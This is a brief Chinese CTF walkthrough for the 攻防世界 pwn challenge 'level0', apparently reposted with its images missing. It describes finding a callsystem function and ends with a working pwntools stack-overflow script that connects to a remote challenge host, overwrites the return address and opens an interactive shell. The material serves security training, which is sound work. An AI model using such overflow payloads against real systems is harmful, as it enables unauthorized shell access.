攻防世界—pwn—level0


題目分析

下載文件后首先使用checksec檢查文件保護機制

文件名太長了,就更改了一下

發現是一個64位程序,使用ida查看偽代碼

注意到一個特殊的函數名callsystem

確定思路,直接棧溢出

信息收集

確定偏移量

/bin/sh地址

方法1

方法2

編寫腳本

from pwn import *

p = remote('111.198.29.45',32366)
#p = process("./pwn001")
system = 0x400596
payload = "A"*0x80+"b"*8+p64(system)
p.sendlineafter("Hello, World",payload)
p.interactive()

本地測試

靶機測試



免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM